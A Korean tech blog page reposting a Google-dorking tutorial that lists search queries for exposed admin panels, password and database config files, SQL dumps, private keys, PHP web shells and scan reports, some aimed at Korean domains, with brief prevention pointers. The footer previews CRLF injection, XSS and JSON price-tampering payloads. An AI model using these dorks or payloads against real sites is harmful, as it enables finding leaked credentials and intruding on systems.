기본 콘텐츠로 건너뛰기

test

* 39.117.243.43 * | Home | Profile | Linux | 자료실 | zabbix | Mysql 5.6 | 갤러리 | 성경검색 | 해피니스 | 자유게시판 | 게시물검색 | L | O | R | [기초강좌] 구글 검색 옵션 작성자 : rootmanDate : 2007-02-07 09:39 | Hit : 729,786 --------------------------------------------- facebook 관련글 검색 --------------------------------------------- 키워드 + space + site:facebook.com 키워드 + spcae + site:facebook.com/pages 키워드 + spcae + site:facebook.com/group 키워드 + spcae + site:facebook.com/profile --------------------------------------------- 로그 파일 --------------------------------------------- db filetype:log intitle:"index of" intext:(backup|백업|bak|dump) --------------------------------------------- 로그인 --------------------------------------------- 로그인 inurl:/admin filetype:php inurl:/admin filetype:asp "VNC Desktop" inurl:5800 intitle:"원격 데스크톱 웹 연결" inurl:tsweb intitle:관리자 로그인 intitle:"인트라넷" intitle:"intranet" intitle:"직원용 intitle:"사내" intext:로그인" --------------------------------------------- 패스워드 파일 --------------------------------------------- intext:mysql_connect+pass intext:mysql_connect filetype:bak inurl:"/level/*/exec/" intext:password intitle:index.of intext:sc_serv_gui.ini filetype:ini wcx_ftp intitle:index.of ws_ftp.ini intitle:technote inurl:cgi-bin --------------------------------------------- 해킹 파일 검색 --------------------------------------------- intitle:"PHP Shell *" intext:Command filetype:php --------------------------------------------- 해킹 파일 검색 --------------------------------------------- inurl:/_vti_bin/shtml.exe inurl:/cgi-bin/finger inurl:cgi-bin/guestbook.pl inurl:/_vti_pvt/admin.pwd inurl:/phpBB/search.php inurl:/zeroboard/login.php inurl:/cgi-bin/14all.cgi --------------------------------------------- 민감한 데이터 --------------------------------------------- intitle:index.of .bash_history or index.of .sh_history allintext:대외비 --------------------------------------------- 포트 스캐너 --------------------------------------------- "VNC Desktop" inurl:5800 inurl:":10000" intext:webmin inurl:8080 -inurl:board -intext:8080 or inurl:8000 -inurl:board -intext:8000 intitle:"Network query tool" filetype:php or inurl:nqt.php --------------------------------------------- SQL 데이터 수집 --------------------------------------------- "access denied for user" "using password" "access denied for user" "using password" site:co.kr "# Dumping data for table" "# Dumping data for table" username password "# Dumping data for table(username|user|pass|password|passwd)" "ORA-00933: SQL command not properly ended" "Unclosed quotation mark before the character string" intitle:"에러" "에러 발생" filetype:asp intitle:"Error" "에러 발생" filetype:asp Mysql error message: "supplied argument" inurl:main.php3 Welcome to phpMyAdmin site:co.kr filetype:sql+"IDENTIFIED BY" -cvs or filetype:dmp+"IDENTIFIED BY" -cvs filetype:"(sql|dmp|dump|inc)" password filetype:mdb inurl:users.mdb "Warning:pg_connet(): Unalbe to connect to PostgreSQL server:FATAL" filetype:ldb admin inurl:db intext:password filetype:sql filetype:"(sql|dmp|dump|inc)" password inurl:config.php dbuname dbpass inurl:nuke filetype:sql -cvs filetype:inc intext:mysql_connect filetype:inc dbconn site:kr --------------------------------------------- 인증서 --------------------------------------------- BEGIN(CERTIFICATE|RSA|DEA) filetype:key, or filetype:cer or filetype:der filetype:pem PRIVATE -cvs --------------------------------------------- 취약점 스캐너 --------------------------------------------- "This file was generated by Nessus" -site:ihackstuff.com "This file was generated by Network Security Scanner" site:co.kr intext:"QualysGuard" -site:qualys.com intitle"X-Scan Report" intext:"This file was generated by X-Scan" "Network Vulnerability Assessment Report" --------------------------------------------- 침입탐지 데이터 --------------------------------------------- ACID "by Roman Danyliw" filetype:php --------------------------------------------- SSH Key --------------------------------------------- filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS --------------------------------------------- IRC --------------------------------------------- filetype:cgi "cgi:irc" filetype:conf inurl:psybnc.conv "USER.PASS=" --------------------------------------------- 방어(Prevention) --------------------------------------------- 1. Googledork Prevention Googledork Prevention(FoundStone, Inc. SiteDigger) 2. 자동 검색 툴을 이용한 방어 (GoogleAlert, Inc. http://www.googlealert.com) (gooscan http://johnny.ihackstuff.com) Total. 197 번호 분류 제목 작성자 등록일 조회수 122 기초강좌 아파치 로그 파일 - 특이한 녀석들은 따로 담거나 없애기 rootman 06-30 6545 121 기초강좌 Linux /proc/pid/stat 구조 rootman 06-30 8466 120 기초강좌 e2fsck 를 이용한 파일시스템 무결성 점검 rootman 06-12 6172 119 기초강좌 grep 검색어에 highlight 주기 rootman 04-22 5597 118 기초강좌 nfs 사용하기 rootman 04-10 8085 117 기초강좌 ssh 패스워드 없이 로그인하기 rootman 01-28 9411 116 기초강좌 하드디스크 온도 측정하기(smartctl 이용) rootman 12-31 7590 115 기초강좌 [HTML] HTML에서 사용하는 주요 메타테그 rootman 12-10 6229 114 기초강좌 [BMT] bonnie++를 통한 시스템 벤치마킹(BMT Tool) rootman 11-24 17681 113 기초강좌 [vim] /etc/vimrc 설정 파일 rootman 11-12 6855 112 기초강좌 커널에 모듈 추가 rootman 11-05 5861 111 기초강좌 CentOS에서 smtp relay 제공하기 rootman 06-05 6552 110 기초강좌 파일시스템 관련명령어 rootman 05-24 8938 109 기초강좌 ramdisk 이용하기 rootman 03-02 9629 108 기초강좌 구글 검색 옵션 rootman 02-07 729787 처음 1 2 3 4 5 6 7 8 9 10 다음 맨끝 제출 AND OR 2. googlehackking https://m.blog.naver.com/ppp7009/70153191675

댓글

이 블로그의 인기 게시물

HackerOne Vulnerability Analysis 1

이 문서는  HackerOne 에서  제출된 많은 보고서들을 토대로 핵심 Payload만 요약하여 직접 작성하였습니다. Link :  https://hackerone.com/ Vulnerabilities list 1. CRLF Injection 2. Open Redirection  3. Cross-Site-Scripting 4. SQL-Injection 5. Path Traversal  CRLF Injection PoC http://www.myshopify.com/xxcrlftest%0aSet-Cookie:test=test3;domain=.myshopify.com; https://www.blackfan.myshopify.com/xxx%0aSet-Cookie:test=test2;domain=.myshopify.com; HTTP Response: HTTP/1.1 302 Moved Temporarily ... Location: http://myshopify.com/xxcrlftest Set-Cookie:test=test;domain=.myshopify.com; PoC: https://engineeringblog.yelp.com/xxcrlftest%0d%0aSet-Cookie:%20test=test;domain=.yelp.com HTTP Response: HTTP/1.1 301 Moved Permanently ... Location: http://engineeringblog.yelp.com/xxcrlftest Set-Cookie: test=test;domain=.yelp.com PoC (Chrome, Internet Explorer) http://gratipay.com/%0dSet-Cookie:csrf_token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; HTTP Resp...

Juice Shop XSS [ Dom based XSS ]

Juice Shop XSS [ Dom based XSS ] Search 입력란에 악성 스크립트를 넣어 XSS 취약점을 진단합니다. Payload :  <iframe src="javascript:alert(`xss`)">   다음과 같이 이는 < , > 는 &lt; , &gt; 로 특수문자를 필터링하지 않기에 XSS 에 취약합니다.

JSON Injection

JSON Injection [Description] JSON은 XML과 같이 주입공격에 취약합니다. 따라서 공격자는 JSON 엔터티에 임의의 요소나 속성을 삽입함으로써 , JSON Injection 이 가능합니다. 우리의 목표는 더 저렴한 가격으로 가격을 조작하여 물품을 구매하는것입니다. [그림1]   [그림1]   물품 가격 출력 그림. [그림1] 같이 N/A , Newark,Chicago 의 물품 가격이 존재합니다. 우리는 이러한 물품 가격을 조작하여 좀 더 저렴한 가격으로 구매가 가능한지에 대한 취약점 여부를 진단합니다.    [그림2] [그림2]  가격 조작 그림. [그림2] 와 같이 "N/A" 가격의 금액을 원래 금액인 $600 달러에서 $1달러로 변경하고 "Newark, Chicago" 가격의 금액을 원래 금액인 $300 달러에서 $1달러로 변경 후 전송하여 취약점을 진단합니다. [그림3] [그림3]  가격 조작 성공 금액 원래 금액인 가격을 $1달러로 변경 후 , 전송 시 [그림3] 과 같이 성공적으로 가격이 변경되는것을 확인할수있습니다.  [그림4] [그림4]  조작한 두 개의 물품을 모두 체크하여 구매한 그림. [그림3] 에서 조작한 금액을 모두 체크하여 전송 시 [그림4] 와 같이  성공적으로 구매가  가능합니다. [impact] 공격자는 JSON 주입 공격을 통해 물품 가격을 임의로 수정하여 원하는 금액에 구매가 가능합니다.